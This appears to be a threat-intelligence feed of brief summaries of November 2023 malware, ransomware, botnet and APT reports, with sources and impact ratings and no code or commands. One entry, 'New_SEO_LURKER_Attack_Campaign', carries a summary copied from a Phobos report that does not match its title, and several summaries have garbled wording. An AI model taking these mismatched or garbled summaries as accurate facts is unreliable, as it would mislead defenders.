https://www.cyfirma.com/outofband/emerging-maas-operator-sordeal-releases-nova-infostealer/
—
- Intel Source:
- Censys
- Intel Name:
- Tracking_Vidar_malware_infrastructure
- Date of Scan:
- 2023-11-29
- Impact:
- LOW
- Summary:
- The security researcher shared his details about one of the more advanced stealers: Vidar. Vidar is a piece of malware originating from the Arkei Stealer but uses new methods to find and direct traffic to the attacker.
—
- Intel Source:
- Russian Panda
- Intel Name:
- MetaStealer_analysis
- Date of Scan:
- 2023-11-29
- Impact:
- LOW
- Summary:
- Russian Panda researchers provided the technical analysis and overview of Red Stealer’s some functionalities. It had so many similarities with Redline Stealer.
Source:
https://russianpanda.com/2023/11/20/MetaStealer-Redline%27s-Doppelganger/
—
- Intel Source:
- cybereason
- Intel Name:
- Delivering_DJvu_Variant_while_Posing_as_Freeware_via_Loader
- Date of Scan:
- 2023-11-29
- Impact:
- MEDIUM
- Summary:
- Researchers from Cybereason have seen DJvu variants distributing through loaders that appear to be freeware. They present an overview of these dangers and offer doable suggestions for defending against them.
Source:
https://www.cybereason.com/hubfs/dam/collateral/reports/threat-alert-DJvu-variant.pdf
—
- Intel Source:
- Fortinet
- Intel Name:
- GoTitan_Botnet_Exploiting_Apache_ActiveMQ_Vulnerability
- Date of Scan:
- 2023-11-29
- Impact:
- LOW
- Summary:
- Threat actors are aggressively using the recently discovered severe security weakness affecting Apache ActiveMQ to spread a new Go-based botnet named GoTitan and a.NET application called PrCtrl Rat, which has the ability to remotely takeover the compromised servers.
Source:
https://www.fortinet.com/blog/threat-research/gotitan-botnet-exploitation-on-apache-activemq
—
- Intel Source:
- Weixin
- Intel Name:
- The_delivery_of_the_Remcos_Trojan
- Date of Scan:
- 2023-11-29
- Impact:
- LOW
- Summary:
- The QiAnXin Threat Intelligence Center observed that Spyder has undergone at least two rounds of updates since July, and found that attackers used Spyder to implant the Remcos Trojan into the target host. The Spyder malware is associated with the Maharashtra organization, and its main function is to download and run executable files issued by the C2 server.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Persian_Remote_World_malicious_activity
- Date of Scan:
- 2023-11-28
- Impact:
- LOW
- Summary:
- Cyble research center identified a website selling malicious tools, including RATs, loaders, and crypters, which can enable unauthorized control, identity theft, financial fraud, and system modifications. Recommendations to protect against these tools are provided, as well as MITRE ATT&CK® Techniques and Indicators of Compromise (IOCs).
Source:
https://cyble.com/blog/new-persian-remote-world-selling-a-suite-of-malicious-tools/
—
- Intel Source:
- Any.run
- Intel Name:
- Diving_Deep_into_RisePro_Malware
- Date of Scan:
- 2023-11-28
- Impact:
- LOW
- Summary:
- AnyRun researchers have examined the RisePro malware. The spyware, which steals information, was initially discovered by cybersecurity companies Sekoia and Flashpoint. It is disseminated via fake crack websites run by the pay-per-install (PPI) malware distribution firm PrivateLoader. Its goal is to take cryptocurrency wallets, passwords, and credit cards from compromised machines.
Source:
https://any.run/cybersecurity-blog/risepro-malware-communication-analysis/
—
- Intel Source:
- Malware Traffic Analysis
- Intel Name:
- AgentTesla_infection_with_FTP_data_exfil
- Date of Scan:
- 2023-11-28
- Impact:
- LOW
- Summary:
- This article provides an overview of an AgentTesla infection with FTP data exfiltration that occurred on 2023-11-22. It includes associated files, malware/artifacts, email headers, and infection chain. Malware/artifacts include a RAR archive, VBS file, script, PNG image, DLL, reversed base64 text, and AgentTesla EXE. Infection traffic is also listed, including IP addresses and ports used.
Source:
https://www.malware-traffic-analysis.net/2023/11/22/index.html
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_2_state_sponcored_North_Korean_campaigns_targeting_job_seekers
- Date of Scan:
- 2023-11-28
- Impact:
- MEDIUM
- Summary:
- The team at Palo Alto Networks Unit 42 released some great research of North Korean activity leveraging remote work in two unique campaigns they call Contagious Interview and Wagemole. Both campaigns have the goals of espionage and cryptocurrency theft.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Insight_into_groups_operating_Telekopye_bots
- Date of Scan:
- 2023-11-28
- Impact:
- LOW
- Summary:
- Welivesecurity published their article about Telekopye, a Telegram bot that helps cybercriminals scam people in online marketplaces. Telekopye can craft phishing websites, emails, SMS messages, and more.
Source:
https://www.welivesecurity.com/en/eset-research/telekopye-hunting-mammoths-using-telegram-bot/
—
- Intel Source:
- Virustotal Blog
- Intel Name:
- Actionable_day_in_a_Threat_Hunters_life_report
- Date of Scan:
- 2023-11-28
- Impact:
- LOW
- Summary:
- This article explains how to use VirusTotal Intelligence (VTI) to hunt and monitor malicious activity, using third-party intelligence reports. It provides examples of how to use VTI to search for samples with similar behaviors, and how to convert VTI queries into YARA rules for use in VirusTotal Livehunt.
Source:
https://blog.virustotal.com/2023/11/actionable-threat-intel-vi-day-in.html
—
- Intel Source:
- ASEC
- Intel Name:
- Exploiting_an_Apache_ActiveMQ_Vulnerability_CVE_2023_46604
- Date of Scan:
- 2023-11-27
- Impact:
- MEDIUM
- Summary:
- The Andariel threat group has been targeting South Korean companies and institutions with spear phishing, watering hole, and supply chain attacks. Recently, they have been exploiting a Log4Shell vulnerability, targeting MS-SQL servers, and abusing legitimate software. AhnLab Security Emergency Response Center (ASEC) discovered the group exploiting a remote code execution vulnerability (CVE-2023-46604) in Apache ActiveMQ servers to install malware, including NukeSped, HelloKitty ransomware, Metasploit Meterpreter’s Stager, and CobaltStrike Beacon. The article provides hashes, C&C servers, and URLs associated with the malicious files.
—
- Intel Source:
- NIS
- Intel Name:
- Hackers_Utilize_Supply_Chain_Attacks_With_Zero_Day_Vulnerabilities
- Date of Scan:
- 2023-11-27
- Impact:
- MEDIUM
- Summary:
- The National Intelligence Service (NIS) of Korea and the National Cyber Security Centre (NCSC) have issued a warning over the North Korean Lazarus hacker group’s use of a zero-day vulnerability in the MagicLine4NX software to perform supply-chain assaults against businesses.
Source:
https://www.documentcloud.org/documents/24174869-rok-uk-joint-cyber-security-advisoryeng
—
- Intel Source:
- Esentire
- Intel Name:
- Parallax_RAT_infection
- Date of Scan:
- 2023-11-27
- Impact:
- LOW
- Summary:
- Parallax RAT is a malware discovered by eSentire’s TRU. It is delivered to machines, has capabilities to evade detection, and can be used to compromise endpoints. Recommendations are provided to protect against it, as well as indicators of compromise.
Source:
https://www.esentire.com/blog/unveiling-parallax-rat-a-journey-from-infection-to-lateral-movement
—
- Intel Source:
- Sentilone
- Intel Name:
- DPRK_Crypto_Theft
- Date of Scan:
- 2023-11-27
- Impact:
- MEDIUM
- Summary:
- This article discusses two North Korean-aligned macOS campaigns in 2023: RustBucket and KandyKorn. RustBucket used a Swift-based application bundle and KandyKorn used a five-stage attack with social engineering via Discord. KandyKorn is distributed as Cross-Platform Bridges.zip and contains multiple benign Python scripts. SentinelOne Singularity detects and protects against all known components of KandyKorn and RustBucket malware.
—
- Intel Source:
- Qualys
- Intel Name:
- Phobos_Ransomware_Masquerading_As_VX_Underground
- Date of Scan:
- 2023-11-27
- Impact:
- LOW
- Summary:
- Phobos ransomware is a malicious software masquerading as VX-Underground, distributed via stolen RDP connections. It halts execution if Cyrillic alphabets are present, kills processes, deletes shadow copies, and encrypts files with a “.VXUG” extension. Qualys Threat Research is monitoring the attack and providing hunting queries for detection.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Taking_Edge_Off_Systemjoker_in_Israel_Hamas_War_Spotlight
- Date of Scan:
- 2023-11-24
- Impact:
- MEDIUM
- Summary:
- Researchers at Check Point have traced the development of SysJoker, a previously unidentified multi-platform backdoor that was used by an APT with ties to Hamas to target Israel.
Source:
https://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Distributing_Atomic_Stealers_via_Fake_Browser_Updates
- Date of Scan:
- 2023-11-24
- Impact:
- LOW
- Summary:
- Researchers at Malwarebytes have discovered that AMOS is being distributed to Mac users through a fake browser update chain known as “ClearFake.” This might be the first time that one of the most popular social engineering campaigns which was previously exclusive to Windows branches out into other operating systems in addition to geolocation.
—
- Intel Source:
- Fortinet
- Intel Name:
- Konni_Campaign_Spreading_Through_a_Malicious_File
- Date of Scan:
- 2023-11-24
- Impact:
- LOW
- Summary:
- The Russian-language Word document that has a malicious macro included in it is being used in the ongoing Konni campaign, according to FortiGuard Labs. Internal telemetry shows continued engagement on the campaign’s C2 server even though the document was created in September.
Source:
https://www.fortinet.com/blog/threat-research/konni-campaign-distributed-via-malicious-document
—
- Intel Source:
- SOC Radar
- Intel Name:
- An_Overview_of_Volt_Typhoon
- Date of Scan:
- 2023-11-24
- Impact:
- LOW
- Summary:
- Volt Typhoon, also known as BRONZE SILHOUETTE, is an advanced, state-sponsored Advanced Persistent Threat (APT) organization that is mostly thought to have originated in China. Their online activities have been meticulously observed and recorded over the last few years by numerous cybersecurity companies, international intelligence agencies, and governmental organizations.
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- Missuse_of_MQTT_Messaging_Protocol_by_Stealthy_WailingCrab_Malware
- Date of Scan:
- 2023-11-24
- Impact:
- LOW
- Summary:
- Researchers from IBM X-Force have been monitoring changes made to the WailingCrab malware family. They have focused on changes that affect the virus’s C2 communication techniques, which involve abusing the MQTT Internet-of-Things (IoT) messaging protocol.
Source:
https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
—
- Intel Source:
- Akamai
- Intel Name:
- Marai_Based_Botnet_Explores_Two_Zero_Days
- Date of Scan:
- 2023-11-23
- Impact:
- LOW
- Summary:
- Researchers from Akamai have uncovered a brand-new DDoS botnet, called InfectedSlurs, that targets routers and network video recorders (NVRs) by actively taking advantage of two zero-day vulnerabilities.
Source:
https://www.akamai.com/blog/security-research/new-rce-botnet-spreads-mirai-via-zero-days
—
- Intel Source:
- Trend Micro
- Intel Name:
- Malicious_Chrome_Extensions_Targeting_Brazil
- Date of Scan:
- 2023-11-23
- Impact:
- LOW
- Summary:
- Researchers from Trend Micro have described the modular architecture of malicious Chrome extensions, which are made up of a number of highly obfuscated parts that use the Google Chrome API to monitor, intercept, and steal victim data.
—
- Intel Source:
- Microsoft
- Intel Name:
- Modified_CyberLink_Installer_Distributing_by_Diamond_Sleet
- Date of Scan:
- 2023-11-23
- Impact:
- MEDIUM
- Summary:
- Microsoft researchers have discovered a supply chain attack using a malicious version of an application created by CyberLink Corp. that was carried out by the North Korea-based threat actor Diamond Sleet (ZINC). This malicious file is actually an installer for a CyberLink application, but it has been altered to contain malicious code that loads a second-stage payload and downloads and decrypts it.
—
- Intel Source:
- ReliaQuest
- Intel Name:
- Scattered_Spider_Attack_Analysis
- Date of Scan:
- 2023-11-23
- Impact:
- LOW
- Summary:
- ReliaQuest recently observed an intrusion to a customer’s internal IT documentation, and a lateral access move from the customer’s identity-as-a-service (IDaaS) provider to their on-premises assets in reallu short time minutes. It was detected that it was the highly capable “Scattered Spider” cybercrime group perpetrated the attack. Scattered Spider, an “ALPHV”/“BlackCat” ransomware affiliate, infiltrates cloud and on-premises environments via social engineering.
Source:
https://www.reliaquest.com/blog/scattered-spider-attack-analysis-account-compromise/
—
- Intel Source:
- Securelist
- Intel Name:
- HrServ_web_shell_analysis
- Date of Scan:
- 2023-11-23
- Impact:
- LOW
- Summary:
- Securelist got a DLL file, that was identified as hrserv.dll, and was previously unknown web shell exhibiting sophisticated features such as custom encoding methods for client communication and in-memory execution.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Possible_Return_of_Genesis_Market_malicious_operations
- Date of Scan:
- 2023-11-23
- Impact:
- LOW
- Summary:
- The Trend Micro Managed XDR team observed malicious campaigns that was very similar to the ones used by Genesis Market. The threat actor used Node.js to act as a platform for the backdoor, Extended Validation (EV) Code Signing for defense evasion, and possibly Google Colab to host search engine-optimized download sites. The Trend Micro researchers provided in their blog a technical analysis of these attacks, including the confirmation and speculations on the other techniques used by the threat actor behind these activities.
Source:
https://www.trendmicro.com/en_us/research/23/k/attack-signals-possible-return-of-genesis-market.html
—
- Intel Source:
- Malware news
- Intel Name:
- The_distribution_of_Atomic_Stealer_to_Mac_users
- Date of Scan:
- 2023-11-23
- Impact:
- LOW
- Summary:
- Atomic Stealer, aka AMOS, is an known stealer for Mac OS. Reently it was observed a new development, AMOS is now being delivered to Mac users via a fake browser update chain tracked as ‘ClearFake’. It is the first time it was observed this main social engineering campaigns, previously reserved for Windows. The threat actors could widden their new possibilities by stealing credentials and files of interest that can be monetized immediately or repurposed for additional attacks.
Source:
https://malware.news/t/atomic-stealer-distributed-to-mac-users-via-fake-browser-updates/75907
—
- Intel Source:
- NCC Group
- Intel Name:
- Analysis_of_NoEscape_Ransomware_Group
- Date of Scan:
- 2023-11-22
- Impact:
- LOW
- Summary:
- NoEscape seems to focus on weak external services; the first way in was via taking advantage of a Microsoft Exchange server that was exposed to the public within the victim’s network. Webshells were built on the server as a result of exploitation, which also provided the threat actor with an early footing in the environment.
—
- Intel Source:
- VMware
- Intel Name:
- NetSupport_RAT
- Date of Scan:
- 2023-11-22
- Impact:
- LOW
- Summary:
- Threat analysts from CarbonBlack and VMWare observed more than 15 new infections linked to NetSupport RAT last couple weeks. It was observed that the most of it were from the Education, Government, and Business Services sectors. VMWare analysts described in their report about their methods of detecting and preventing this malware, along with providing valuable insights and resources for defenders. In these latest attacks, the NetSupport RAT has been observed to be downloaded onto a victim’s computer via deceptive websites and fake browser updates. Initial infection, however, can vary depending on the threat actors.
Source:
https://blogs.vmware.com/security/2023/11/netsupport-rat-the-rat-king-returns.html
—
- Intel Source:
- Checkpoint
- Intel Name:
- A_Comparative_Analysis_of_Ransomware_Attacks_on_Windows_and_Linux
- Date of Scan:
- 2023-11-22
- Impact:
- LOW
- Summary:
- An analysis of a number of the most recent attacks involving ransomware that have been targeting Linux and ESXi systems, which have been increasingly targeted in recent years, has been made available by Check Point Researchers. Though these are still comparatively rudimentary versions that target Linux, they have long been aware of comparable ransomware threats in Windows setups.
—
- Intel Source:
- Seebug
- Intel Name:
- Examination_of_Confluence_Server_Ransomware_Attack_with_C3RB3R
- Date of Scan:
- 2023-11-22
- Impact:
- LOW
- Summary:
- According to a security team, vulnerabilities in the Atlassian Confluence Datacenter and Server software have been found recently. Attackers have used this vulnerability time and time again to target Linux and Windows systems with fresh variants of the C3RB3R (Cerber) ransomware.
Source:
https://paper.seebug.org/3076/
—
- Intel Source:
- Palo Alto
- Intel Name:
- A_North_Korean_Group_is_Behind_Two_Job_Related_Campaigns
- Date of Scan:
- 2023-11-22
- Impact:
- LOW
- Summary:
- Researchers from Unit 42 have uncovered two distinct campaigns that target job-seeking activities connected to threat actors with state sponsorship that are connected to the Democratic People’s Republic of Korea (DPRK), also referred to as North Korea.
Source:
https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/
—
- Intel Source:
- Any.Run
- Intel Name:
- XWorm_Malware_campaign
- Date of Scan:
- 2023-11-22
- Impact:
- LOW
- Summary:
- The analyst from Tweater shared on Any.Run blog about his explore and understand the dynamics occurring when a successful connection is established between the XWorm operating server and a user who has fallen victim to executing this malware.
Source:
https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_Malicious_LNK_File
- Date of Scan:
- 2023-11-22
- Impact:
- LOW
- Summary:
- Recently, ASEC has observed a malicious LNK file being distributed to financial and blockchain corporation personnel through email and other ways.
—
- Intel Source:
- Trellix
- Intel Name:
- The_DarkGate_Malware_as_a_Service_continuation
- Date of Scan:
- 2023-11-22
- Impact:
- LOW
- Summary:
- The Trellix researchers analyzed developed DarkGate malware versions 4.6, 4.10.2, 4.17b, and the latest 5.0.19, mapping the rapid evolution of the malware. DarkGate is a complete toolkit that provides attackers with extensive capabilities to fully compromise victim systems.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Java_Based_Rude_Stealer
- Date of Scan:
- 2023-11-22
- Impact:
- LOW
- Summary:
- Cyble researchers observed a new stealer named “Rude”. This Java-based malware is specifically made up for pilfer confidential data from compromised machines discreetly.
Source:
https://cyble.com/blog/new-java-based-rude-stealer-abuses-directx-diagnostic-tool/
—
- Intel Source:
- CISA
- Intel Name:
- LockBit_3_0_ransomware_exploiting_CVE_2023_4966
- Date of Scan:
- 2023-11-21
- Impact:
- MEDIUM
- Summary:
- CISA, FBI, MS-ISAC, and Australian Signals Directorate’s Australian Cyber Security Center (ASD’s ACSC) are releasing this joint Cybersecurity Advisory (CSA) to disseminate IOCs, TTPs, and detection methods associated with LockBit 3.0 ransomware exploiting CVE-2023-4966, labeled Citrix Bleed, affecting Citrix NetScaler web application delivery control (ADC) and NetScaler Gateway appliances.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- New_SEO_LURKER_Attack_Campaign
- Date of Scan:
- 2023-11-21
- Impact:
- MEDIUM
- Summary:
- Cisco Talos recently identified the most creative Phobos variants, common affiliate tactics, techniques and procedures (TTPs), and characteristics of the Phobos affiliate structure, based on observed Phobos activity and analysis of over 1,000 Phobos samples back from some time ago. Talos analysts convinced that Eking, Eight, Elbie, Devos and Faust are the most common Phobos variants, as they appeared most frequently across the samples Talos analyzed.
—
- Intel Source:
- cybereason
- Intel Name:
- INC_Ransom_Group_Targets_Western_Organizations_with_Double_Extortion
- Date of Scan:
- 2023-11-21
- Impact:
- LOW
- Summary:
- Cybereason issues Threat Alerts regarding a new ransomware group, INC Ransom, that has surfaced in August 2023. Operating primarily in the United States and Europe, the group employs a double and triple extortion strategy, leaking data on a dedicated blog and exercising pressure on victims to pay the ransom. INC Ransom’s victims consist mainly of private sector businesses, with a notable incident involving a government organization and a charity association. The group’s modus operandi involves using compromised credentials for lateral movement, deploying ransomware through WMIC and PSEXEC, and employing tools like MegaSync for data exfiltration.
Source:
https://www.cybereason.com/blog/threat-alert-inc-ransomware
—
- Intel Source:
- Kilguard, ASEC
- Intel Name:
- Ddostf_Botnet_Resurfaces_in_DDoS_Attacks
- Date of Scan:
- 2023-11-21
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have shared their concerns about a new campaign focusing on MySQL servers and Docker hosts with DDoS malware. Researchers declare that this malware is meant to launch DDoS attacks and that the risk actor is working a DDoS-for-retain the services of support.
Source:
https://kilguard.net/ddostf-botnet-resurfaces-in-ddos-attacks-against-mysql-and-docker-hosts/
—
- Intel Source:
- PaloAlto
- Intel Name:
- Stately_Taurus_campaigns
- Date of Scan:
- 2023-11-21
- Impact:
- LOW
- Summary:
- Unit 42 researchers discovered three Stately Taurus attacks during the month of August. These attacks are targeting entities in the South Pacific including the Philippines government. The campaigns manipulated legitimate software including Solid PDF Creator and SmadavProtect (an Indonesian-based antivirus solution) to sideload malicious files.Stately Taurus (aka Mustang Panda, Bronze President, Red Delta, Luminous Moth, Earth Preta and Camaro Dragon) has been operating since at least 2012. It is assessed to be a Chinese advanced persistent threat (APT) group that routinely conducts cyberespionage campaigns
Source:
https://unit42.paloaltonetworks.com/stately-taurus-targets-philippines-government-cyberespionage/
—
- Intel Source:
- Ciberdefensa
- Intel Name:
- Malicious_LNK_File_Campaign_Targeting_Financial_and_Blockchain_Corporations
- Date of Scan:
- 2023-11-21
- Impact:
- MEDIUM
- Summary:
- A recent security alert from AhnLab Security Emergency Response Center (ASEC) reveals a sophisticated campaign distributing malicious LNK files to personnel within financial and blockchain corporations. The malicious files, disguised as legitimate documents, deceive users during the opening process. The LNK files execute obfuscated PowerShell commands, leading to the creation of additional files and potential compromise of systems.
—
- Intel Source:
- ISC. SANS
- Intel Name:
- Quasar_RAT_Delivery
- Date of Scan:
- 2023-11-21
- Impact:
- LOW
- Summary:
- Researchers from SANS observed old payload Quasar RAT that was delivered through updated SharpLoader. Its purpose is to load and uncompress a C# payload from a remote web server or a local file to execute it.
—
- Intel Source:
- ASEC
- Intel Name:
- The_Andariel_group_distributing_malware
- Date of Scan:
- 2023-11-21
- Impact:
- LOW
- Summary:
- The ASEC analysts observed the presense of the Andariel group spreading malware via an attack using a certain asset management program. The Andariel group is known to be linked to a sub organization of the Lazarus group.
—
- Intel Source:
- Uptycs
- Intel Name:
- WinRAR_0_day_CVE_2023_38831_Vulnerability
- Date of Scan:
- 2023-11-21
- Impact:
- MEDIUM
- Summary:
- Recently, it has been discovered that the WinRAR vulnerability, tracked as CVE-2023-38831, has compromised its handling of file extensions, giving opportunities for unauthorized code execution. Uptycs Threat Research Team has outlined the WinRAR vulnerability in a previous blog, detailing its exploitation and providing technical insights.
Source:
https://www.uptycs.com/blog/cve-2023-38831-winrar-zero-day
—
- Intel Source:
- Outpost24
- Intel Name:
- A_new_Anti_Sandbox_technique_LummaC2_4_0_stealer
- Date of Scan:
- 2023-11-21
- Impact:
- LOW
- Summary:
- Outpost24 threat researchers dived in deep into a new Anti-Sandbox technique LummaC2 v4.0 stealer is using to avoid detonation if no human mouse activity is detected.
Source:
https://outpost24.com/blog/lummac2-anti-sandbox-technique-trigonometry-human-detection/
—
- Intel Source:
- Talos
- Intel Name:
- The_most_prolific_Phobos_variants_lately
- Date of Scan:
- 2023-11-20
- Impact:
- LOW
- Summary:
- Cisco Talos recently identified the most creative Phobos variants, common affiliate tactics, techniques and procedures (TTPs), and characteristics of the Phobos affiliate structure, based on observed Phobos activity and analysis of over 1,000 Phobos samples back from some time ago. Talos analysts convinced that Eking, Eight, Elbie, Devos and Faust are the most common Phobos variants, as they appeared most frequently across the samples Talos analyzed.
Source:
https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/
—
- Intel Source:
- ASEC
- Intel Name:
- An_Apache_Web_Server_Cryptojacking_Attack_Using_Cobalt_Strike
- Date of Scan:
- 2023-11-20
- Impact:
- LOW
- Summary:
- Researchers from ASEC have kept an eye out for threats directed towards weakly maintained or unpatched web servers. Web servers are key targets for attack by threat actors since they are publicly accessible to provide web services to all users.
—
- Intel Source:
- Sentinelone
- Intel Name:
- A_Deep_Dive_into_a_Decade_of_Hack_for_Hire_Operations
- Date of Scan:
- 2023-11-20
- Impact:
- MEDIUM
- Summary:
- SentinelLabs’ latest report exposes the extensive activities of the Appin Security Group, a prominent player in the hack-for-hire services domain. The comprehensive analysis delves into a myriad of global cyber intrusions involving espionage, surveillance, and disruptive actions across countries such as Norway, Pakistan, China, and India.
Source:
https://www.sentinelone.com/labs/elephant-hunting-inside-an-indian-hack-for-hire-group/
—
- Intel Source:
- Esentire
- Intel Name:
- SolarMarker_Evolution_and_Tactics_Unveiled_in_2023
- Date of Scan:
- 2023-11-20
- Impact:
- LOW
- Summary:
- The eSentire Threat Response Unit (TRU) has closely monitored the SolarMarker malware, also known as Jupyter, since 2021. This .NET-based malware with a backdoor capability primarily targets vulnerable WordPress websites to distribute its payload. Over the years, SolarMarker has evolved its decryption routines, transitioning from XOR encryption to AES while maintaining its core functionality
Source:
https://www.esentire.com/blog/solarmarker-to-jupyter-and-back
—
- Intel Source:
- sentinelone
- Intel Name:
- AI_Crimeware_Ransomware_Surge_Israel_Hamas_Cyber_Warfare
- Date of Scan:
- 2023-11-20
- Impact:
- MEDIUM
- Summary:
- Researchers at SentinelLabs have discovered delves into current trends shaping the cyber threat landscape. It scrutinizes the evolving landscape of AI-driven crimeware, spotlighting tools like FraudGPT and WolfGPT. Additionally, it details notable ransomware incidents targeting institutions such as ICBC, the Toronto Public Library, and Japan Aviation Electronics.
—
- Intel Source:
- Security Boulevard
- Intel Name:
- Underscore_a_persistent_risk_in_open_source_npm_software
- Date of Scan:
- 2023-11-19
- Impact:
- MEDIUM
- Summary:
- Recent discovery of open source software packages on npm platform contain scripts broadcasting peace messages related to ongoing conflicts. These packages are examples of protestware, which can be benign or malicious. Risks of protestware discussed, emphasizing need for development organizations to investigate code they rely on.
Source:
https://securityboulevard.com/2023/11/protestware-taps-npm-to-call-out-wars-in-ukraine-gaza/
—
- Intel Source:
- CERT-UA
- Intel Name:
- Remcos_RAT_attacks_disguised_as_SBU_request
- Date of Scan:
- 2023-11-18
- Impact:
- MEDIUM
- Summary:
- The government computer emergency response team of Ukraine CERT-UA discovered the fact of mass distribution of e-mails, allegedly on behalf of the Security Service of Ukraine, with an attachment in the form of a RAR file “Electronic request of the SBU of Ukraine.rar”.
—
- Intel Source:
- CISA
- Intel Name:
- Scattered_Spider
- Date of Scan:
- 2023-11-18
- Impact:
- HIGH
- Summary:
- The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to recent activity by Scattered Spider threat actors against the commercial facilities sectors and subsectors. This advisory provides tactics, techniques, and procedures (TTPs) obtained through FBI investigations as recently as November 2023. Scattered Spider is a cybercriminal group that targets large companies and their contracted information technology (IT) help desks. Scattered Spider threat actors, per trusted third parties, have typically engaged in data theft for extortion and have also been known to utilize BlackCat/ALPHV ransomware alongside their usual TTPs.
Source:
https://www.cisa.gov/sites/default/files/2023-11/aa23-320a_scattered_spider.pdf
—
- Intel Source:
- Checkmarx
- Intel Name:
- Python_Developers_Hidden_in_Plain_Sight_For_Nearly_Six_Months
- Date of Scan:
- 2023-11-18
- Impact:
- LOW
- Summary:
- Researchers at Checkmarx have discovered that a threat actor has been inserting malicious Python packages into the open-source repository for almost six months. Numerous harmful packages are disguising themselves under names that closely resemble well-known, authentic Python packages. As a result, they were downloaded thousands of times.
—
- Intel Source:
- Antiy CERT
- Intel Name:
- A_new_round_of_attacks_by_the_Youshe_group
- Date of Scan:
- 2023-11-18
- Impact:
- LOW
- Summary:
- Recently, Antiy CERT has detected a new round of phishing attacks by the “Youshe” black product gang (“Silver Fox”) targeting financial personnel and small store merchant customer service. In this round of attacks, the gang disguised the malicious program as a document file and packaged it into a compressed package file. It spread through the model of “black production gang-agent-recruiting members-looking for targets”, inducing users to execute and obtain the victim host. remote control rights.
Source:
https://www.antiy.cn/research/notice&report/research_report/SwimSnake_Analysis.html
—
- Intel Source:
- Intezer
- Intel Name:
- Dismantling_the_IPStorm_Botnet_Infrastructure
- Date of Scan:
- 2023-11-18
- Impact:
- LOW
- Summary:
- The FBI disclosed the breakdown of a botnet proxy network by US law enforcement and the guilty plea of the person in charge of the botnet infrastructure connected to the IPStorm virus. In the continuous fight against cyberthreats, this accomplishment represents a critical turning point. As the new IPStorm malware versions and capabilities spread to infect Linux, Mac, and Android devices worldwide, the research team at Intezer shared their discoveries and analysis with the FBI to aid in their case.
Source:
https://intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/
—
- Intel Source:
- Google Blog
- Intel Name:
- Zimbra_0_day_attacks_on_international_government_organizations
- Date of Scan:
- 2023-11-18
- Impact:
- MEDIUM
- Summary:
- Google’s Threat Analysis Group (TAG) discovered an in-the-wild 0-day exploit targeting Zimbra Collaboration, an email server. Four different groups were observed exploiting the same bug to steal data, credentials, and tokens. TAG urges users to keep software up-to-date and apply security updates to protect against these types of exploits. They also add identified websites and domains to Safe Browsing.
—
- Intel Source:
- Antiy
- Intel Name:
- Analysis_of_a_LockBit_Ransomware_Sample
- Date of Scan:
- 2023-11-18
- Impact:
- MEDIUM
- Summary:
- Ransomware was recently used to attack a financial institution. Information from a number of sources suggests that this incident is closely associated with the group behind the LockBit ransomware attack. Antiy CERT describes LockBit as having a “close association” since it is an attack group that uses the “ransomware as a service” (RaaS) paradigm.
Source:
https://www.antiy.cn/research/notice&report/research_report/LockBit.html
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_malware_mimicking_a_LNK
- Date of Scan:
- 2023-11-17
- Impact:
- LOW
- Summary:
- Malicious shortcut files are being distributed by a threat actor targeting individuals in the field of Korean reunification and national security. The malware breaches user information and downloads additional malware, including TutRAT, which allows malicious behaviors such as keylogging and stealing browser account information. AhnLab recommends subscribing to their threat intelligence platform to check related IOCs.
—
- Intel Source:
- Fortinet
- Intel Name:
- The_NoEscape_ransomware_roundup
- Date of Scan:
- 2023-11-17
- Impact:
- MEDIUM
- Summary:
- NoEscape ransomware group emerged in May 2023 and runs a Ransomware-as-a-Service program targeting multiple industry verticals, primarily in the US. It encrypts files and leaves a ransom note, and victims can contact the threat actor through a TOR site. Fortinet customers are protected, and best practices are provided to protect against ransomware.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-noescape
—
- Intel Source:
- ISC. SANS
- Intel Name:
- MSIX_Package
- Date of Scan:
- 2023-11-17
- Impact:
- LOW
- Summary:
- This article discusses the MSIX package file format and how GHOSTPULSE malware was identified to bypass security controls. It explains how a hunting rule was created to detect ZIP archives containing two files, and provides an example of a low VT score MSIX file. It also explains the content of the wrapper and config files, and how the script “worldhack.ps1” is automatically executed during package installation, with the payload identified as Redline.
—
- Intel Source:
- Securityjoes
- Intel Name:
- An_Extensive_Data_Wiping_Operation_Aimed_Against_Israel
- Date of Scan:
- 2023-11-17
- Impact:
- MEDIUM
- Summary:
- Researchers at SecurityJoes have investigated a sophisticated security compromise that resulted in substantial data loss affecting multiple businesses. Defense contractors and an Israeli data hosting provider were among the targets.
—
- Intel Source:
- Sekto CERT
- Intel Name:
- Cyberattack_on_Danish_Critical_Infrastructure_Linked_to_Russian_Hackers
- Date of Scan:
- 2023-11-17
- Impact:
- MEDIUM
- Summary:
- Possible connections exist between Russian threat actors and what has been called the “largest cyber attack against Danish critical infrastructure,” which took place in May 2023 and targeted 22 businesses involved in the nation’s energy management.
—
- Intel Source:
- CISA
- Intel Name:
- Rhysida_Ransomware
- Date of Scan:
- 2023-11-17
- Impact:
- HIGH
- Summary:
